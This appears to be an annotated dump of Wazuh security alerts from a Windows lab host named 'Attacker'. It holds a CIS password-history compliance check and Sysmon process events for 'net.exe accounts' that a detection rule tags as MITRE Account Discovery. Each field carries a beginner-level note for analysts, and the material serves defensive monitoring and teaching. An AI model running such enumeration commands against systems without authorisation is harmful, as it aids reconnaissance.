data.sca.check.description: This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2155758 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:56.4609484Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43897 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2163095 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:56.6411308Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288443 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:56.629
ProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00}
ProcessId: 9628
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:56.629 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be34-680a-ff0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9628 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2168328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.1756159Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288447 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.169
ProcessGuid: {94294ddc-be35-680a-020c-000000000e00}
ProcessId: 17256
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00}
ParentProcessId: 9628
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.169 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-020c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17256 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9628 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2173383 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.2713241Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288452 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.264
ProcessGuid: {94294ddc-be35-680a-030c-000000000e00}
ProcessId: 10832
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.264 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-030c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2178620 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.3746343Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288454 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.369
ProcessGuid: {94294ddc-be35-680a-050c-000000000e00}
ProcessId: 11376
Image: C:\Windows\SysWOW64\net1.exe
